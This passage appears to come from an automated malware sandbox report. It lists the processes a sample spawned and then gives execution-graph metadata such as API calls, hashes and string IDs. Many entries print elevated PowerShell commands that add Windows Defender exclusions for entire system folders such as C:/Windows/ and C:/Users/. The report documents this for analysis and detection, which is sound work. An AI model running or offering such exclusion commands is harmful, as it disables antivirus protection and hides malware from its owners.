                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:34
                                                      Start time:08:32:31
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:35
                                                      Start time:08:32:31
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:36
                                                      Start time:08:32:31
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:37
                                                      Start time:08:32:31
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:38
                                                      Start time:08:32:31
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:39
                                                      Start time:08:32:31
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:40
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:41
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:42
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:43
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:44
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:45
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:46
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:47
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:48
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:49
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:50
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:51
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:52
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:53
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:54
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:55
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:56
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false


                                                        Execution Graph

                                                        Execution Coverage:14.7%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:11.8%
                                                        Total number of Nodes:34
                                                        Total number of Limit Nodes:3
                                                        execution_graph 20532 7ffd343dd04a 20533 7ffd343dd059 CreateFileTransactedW 20532->20533 20535 7ffd343dd268 20533->20535 20548 7ffd343dd2f5 20550 7ffd343dd31f WriteFile 20548->20550 20551 7ffd343dd48f 20550->20551 20552 7ffd343df0f5 20553 7ffd343df11f VirtualAlloc 20552->20553 20555 7ffd343df23f 20553->20555 20528 7ffd343dec91 20529 7ffd343dec9e GetSystemInfo 20528->20529 20531 7ffd343ded85 20529->20531 20536 7ffd343de6e1 20539 7ffd343de6eb 20536->20539 20537 7ffd343de815 20544 7ffd343dec5a 20537->20544 20539->20537 20540 7ffd343de7db 20539->20540 20541 7ffd343dec5a GetSystemInfo 20540->20541 20542 7ffd343de82a 20541->20542 20543 7ffd343de820 20545 7ffd343dec65 20544->20545 20545->20543 20546 7ffd343ded22 GetSystemInfo 20545->20546 20547 7ffd343ded85 20546->20547 20547->20543 20514 7ffd343db57d 20516 7ffd344415e0 20514->20516 20515 7ffd34441652 20516->20515 20519 7ffd344407d0 20516->20519 20518 7ffd344416c9 20521 7ffd344407db 20519->20521 20520 7ffd3444087e 20520->20518 20521->20520 20523 7ffd34440897 20521->20523 20524 7ffd344408a2 20523->20524 20525 7ffd344408ea ResumeThread 20523->20525 20524->20520 20527 7ffd344409b4 20525->20527 20527->20520

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2220019522.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd343d0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: "$[$[$\$]$]$u${${$}$}
                                                        • API String ID: 0-3490533229
                                                        • Opcode ID: 0465e9ffecc67ae31aadd375760035c915f3a958111582570af04aa725068376
                                                        • Instruction ID: a8e08876d7902e8d0c295804d08dd414d85d4155a8965cbb5c142cf45e5b4e88
                                                        • Opcode Fuzzy Hash: 0465e9ffecc67ae31aadd375760035c915f3a958111582570af04aa725068376
                                                        • Instruction Fuzzy Hash: 98D2A570E196298FDBA8DF18C8957E9B7B1FF59301F5041EAD00DE7291CA39AA81DF40

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: hmY4
                                                        • API String ID: 0-3574876715
                                                        • Opcode ID: b2e2b7087dd195ee8154ac70cc252c3e50d2f06d1def7de7a74627dadc864e84
                                                        • Instruction ID: 5a593e5f03e7a4ced138b7c97f75386a87651ec9698649a41d19465d19c1573c
                                                        • Opcode Fuzzy Hash: b2e2b7087dd195ee8154ac70cc252c3e50d2f06d1def7de7a74627dadc864e84
                                                        • Instruction Fuzzy Hash: 6B529D30E1A6498FDB9ACF58C4E4AB97BB1FF55300F5445BDD54BCB286CA38A981CB40
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2220019522.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd343d0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: 12353673c2d44fdf2439b59d5ce170c0881649180e952a1b82e5e3dce7d370dc
                                                        • Instruction ID: 75806b1cfade73c67054289a9738a01fca1a981f6a32194661e438aab171db03
                                                        • Opcode Fuzzy Hash: 12353673c2d44fdf2439b59d5ce170c0881649180e952a1b82e5e3dce7d370dc
                                                        • Instruction Fuzzy Hash: CF51C17090DA4C8FDB59EFA8D895AE9BFF0FB56310F00416BD04DD7292DA39A845CB41
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2220019522.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd343d0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8b2c62019b8a389e66d2c05db01abaee9476fead8aa438c9456ced610b1a2afc
                                                        • Instruction ID: fc7d8189dc4294d4f8066e4cc71e5fa31aed5356489917a5a0e35808aee4dec3
                                                        • Opcode Fuzzy Hash: 8b2c62019b8a389e66d2c05db01abaee9476fead8aa438c9456ced610b1a2afc
                                                        • Instruction Fuzzy Hash: B4525870A0861D8FDB58DF54C4A0AFDB7B2FF59304F6081B9D04EA7286CB78A956DB40
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2254872705.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd34960000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0b035f1d1241967728e1850bc81543b2b93360bcf52c3c4f15b7ba219d6e51fa
                                                        • Instruction ID: b4d55c8162ba9b3ecf716b071dee8943626daa8e08eb774e8530089a913870f3
                                                        • Opcode Fuzzy Hash: 0b035f1d1241967728e1850bc81543b2b93360bcf52c3c4f15b7ba219d6e51fa
                                                        • Instruction Fuzzy Hash: DCB1EA32A0E7D65FD722EB6C98E10EA7FA4DF0327471901BBC189CB093DE1E64469355
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2254872705.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd34960000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d8134c6f332f08876ca4125a7c92077a483f3a3770285323fab39f69cab2268c
                                                        • Instruction ID: aa5ebfd987f9c9ed12ccfc47f5e9fe4c22a416bbdb079f690bf0b5daf2431d2a
                                                        • Opcode Fuzzy Hash: d8134c6f332f08876ca4125a7c92077a483f3a3770285323fab39f69cab2268c
                                                        • Instruction Fuzzy Hash: 9C71E422A0E6965FE792B7BCA8B10EA7BF4EF03335B1800BBC249C7093DD1D59469355

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: a1_L
                                                        • API String ID: 0-3309210877
                                                        • Opcode ID: f3af1b0fcd824b040f342b7f203326a472eb91b576f8915676f6bace43ea48f9
                                                        • Instruction ID: f45431f642bb6893eb4d7fc7ce4d6b3fa2d7fedd9ae54b87c9255dc45f6369ce
                                                        • Opcode Fuzzy Hash: f3af1b0fcd824b040f342b7f203326a472eb91b576f8915676f6bace43ea48f9
                                                        • Instruction Fuzzy Hash: D9229730B09A1D8FDB9ADB1CC8A9A7977E1FF59311F5441B9D10EC7292DE28AC45CB80

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1607 7ffd343dd04a-7ffd343dd057 1608 7ffd343dd059-7ffd343dd061 1607->1608 1609 7ffd343dd062-7ffd343dd128 1607->1609 1608->1609 1613 7ffd343dd12a-7ffd343dd141 1609->1613 1614 7ffd343dd144-7ffd343dd266 CreateFileTransactedW 1609->1614 1613->1614 1615 7ffd343dd268 1614->1615 1616 7ffd343dd26e-7ffd343dd2f0 1614->1616 1615->1616
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2220019522.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd343d0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID: CreateFileTransacted
                                                        • String ID:
                                                        • API String ID: 2149338676-0
                                                        • Opcode ID: b65ea6610655b218566b2404f3d281191bd4b945ebf21833953ec974f75abba3
                                                        • Instruction ID: f27ac90f9826bed8447d1884223b09f213a9c4fc46043302dad64d9176b1af27
                                                        • Opcode Fuzzy Hash: b65ea6610655b218566b2404f3d281191bd4b945ebf21833953ec974f75abba3
                                                        • Instruction Fuzzy Hash: 5E912570909A5C8FDB99DF58C894BE9BBF1FB6A310F1001AED04DE3291DB75A984CB44
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2220019522.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd343d0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID: FileWrite
                                                        • String ID:
                                                        • API String ID: 3934441357-0
                                                        • Opcode ID: 0f0355813052c81bf1276399254f0dade184392388953bac1d50a577be88c898
                                                        • Instruction ID: 8b0603dfb92ebb4c5766ff141dd4bfffbdd511c853a078babf1eacbc5571d996
                                                        • Opcode Fuzzy Hash: 0f0355813052c81bf1276399254f0dade184392388953bac1d50a577be88c898
                                                        • Instruction Fuzzy Hash: FF611470A08A5C8FDB98DF58C895BE9BBF1FB6A310F1041AED04DE3251DB75A985CB40
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: x3D4
                                                        • API String ID: 0-474182162
                                                        • Opcode ID: 9b11a8d1560b1fe55df6825243902acb6fb460e04c7e1dc2b47ff86c3b1b726b
                                                        • Instruction ID: 448f433acb5158c3072ef225fef1882310ef26bad9b44a362e90f244f10dd421
                                                        • Opcode Fuzzy Hash: 9b11a8d1560b1fe55df6825243902acb6fb460e04c7e1dc2b47ff86c3b1b726b
                                                        • Instruction Fuzzy Hash: 9BD1DD30A0FB468FE3ABDB28D4A45757BE1FF46304B10457EC18AC36E2DA2DB8469741
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2220019522.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd343d0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: b15f0d2be38d260a456d8aafc64021e98bf595e80c28f317c0133af9c6bbca38
                                                        • Instruction ID: b0834e8bc42ed98a07502b293b51f67be5ff77531f912ff1574467d8b2a65448
                                                        • Opcode Fuzzy Hash: b15f0d2be38d260a456d8aafc64021e98bf595e80c28f317c0133af9c6bbca38
                                                        • Instruction Fuzzy Hash: A0413A70E08A1C8FEB54EF98D895AEDBBF0FB5A310F10416AD40DE7252DA75A855CB40
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2220019522.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd343d0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: 24c0050355e319a013aa00a681cfd646617b5a191bdc727c202e695b420a159a
                                                        • Instruction ID: c68269311d96e790fdfbb7fd72895621ead6c7a972f23c0f9ce7cd6ff4797ff2
                                                        • Opcode Fuzzy Hash: 24c0050355e319a013aa00a681cfd646617b5a191bdc727c202e695b420a159a
                                                        • Instruction Fuzzy Hash: 1B418E7090DA8C8FDB59EFA8D899BE9BFF0EB56310F0441ABD04DD7292CA355845CB41
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Hh4
                                                        • API String ID: 0-4232732473
                                                        • Opcode ID: bf18da40896bf55671aaa86c06a646b05f568fe380faabbc3254389558137f40
                                                        • Instruction ID: feff8c2801aec0d18dc9b2076763985c1e6b40006712b1279c03f50fb56d090d
                                                        • Opcode Fuzzy Hash: bf18da40896bf55671aaa86c06a646b05f568fe380faabbc3254389558137f40
                                                        • Instruction Fuzzy Hash: 8171B630E2D64A8FEBA7DB6884A56BC7BA1FF46300F1405BAD20ED71D2DE2C6841D751
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 86d4
                                                        • API String ID: 0-337169510
                                                        • Opcode ID: fbbaf4d598ac029b1843d970dc5fbc4ad4b68b57ef93b8cdb910b4dbc0edbdb2
                                                        • Instruction ID: e466c32aab3ae8854a0ada6d2cb8ca9266d840a7c67c6d2b785bb337b59154c4
                                                        • Opcode Fuzzy Hash: fbbaf4d598ac029b1843d970dc5fbc4ad4b68b57ef93b8cdb910b4dbc0edbdb2
                                                        • Instruction Fuzzy Hash: 3C511331A0EB494FE797DA2898955707BE0EF57320B1502BEC189C71A3D929F847C781
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2220019522.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd343d0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: aea899a46965fe861ee99ab99edefdfeaa2d4bfa32d66df9fde2edffb5aa8bed
                                                        • Instruction ID: 152ce1b554953ebf0781c4fa0b2ba005a7bf312e96eddec336cd2436947b77ba
                                                        • Opcode Fuzzy Hash: aea899a46965fe861ee99ab99edefdfeaa2d4bfa32d66df9fde2edffb5aa8bed
                                                        • Instruction Fuzzy Hash: 5D513A74908A4C8FDF58EF58C895BE9BBF0FB6A310F1042AAD04DE3251DB71A981CB41
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: hmY4
                                                        • API String ID: 0-3574876715
                                                        • Opcode ID: e4d3bf14f72d602dba7edc3691ac6220ada2dc63e7448369a1b141457f315e79
                                                        • Instruction ID: 4c326924f3151bae9199c8fcfa02b3c2d594f52f9d0fddbb4e512a71225ce630
                                                        • Opcode Fuzzy Hash: e4d3bf14f72d602dba7edc3691ac6220ada2dc63e7448369a1b141457f315e79
                                                        • Instruction Fuzzy Hash: C3511321F2D55E4BEBEA9B5884B5AF87AF2FF52300F4441BAD14EC71C6CD2C6A809741
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2254872705.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd34960000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        • Opcode ID: a259cea26bf3fb10706be1967c1cfb4e58e9f44c05e9a8c5e471c0698a50dbe6
                                                        • Instruction ID: 3e481883bff864edf9f912f706679e8cf1a2e5713356eea08edd2dd0d82f33d2
                                                        • Opcode Fuzzy Hash: a259cea26bf3fb10706be1967c1cfb4e58e9f44c05e9a8c5e471c0698a50dbe6
                                                        • Instruction Fuzzy Hash: 71515C71E0960E9FDB59DB98C4A55BDB7B1FF5A320F1040BEC10AE7286CA3D6901DB60
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2254872705.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Instruction ID: 09f896a49073ac77c5ce3d7cb3d05dc8942147e8f8d4c118e81ea5e928dfa28a
